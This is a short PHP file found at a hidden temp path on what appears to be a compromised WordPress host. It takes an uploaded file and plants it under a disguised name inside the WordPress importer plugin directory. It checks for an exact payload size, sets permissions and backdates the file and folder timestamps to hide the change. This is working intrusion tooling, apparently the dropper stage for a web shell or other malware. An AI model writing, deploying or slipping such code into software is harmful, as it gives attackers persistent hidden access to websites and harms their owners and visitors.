File: //tmp/.created
<?php $p = "/home/aoadtech/public_html//home/aoadtech/public_html/wp-content/plugins/wordpress-importer/php-toolkit/ByteStream/manufacturers"; $ft = 1763160508; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) { $filesize = filesize($p); if ($filesize >= 1287892) { @chmod($p, 0744); if ($ft) { @touch($p, $ft, $ft); @touch(@dirname($p), $ft, $ft); } die('_uploaded!_'); } else { if (file_exists($p)) { print "file exists but size = {$filesize} not 1287892"; } @unlink($p); } } die('_upload_failed_');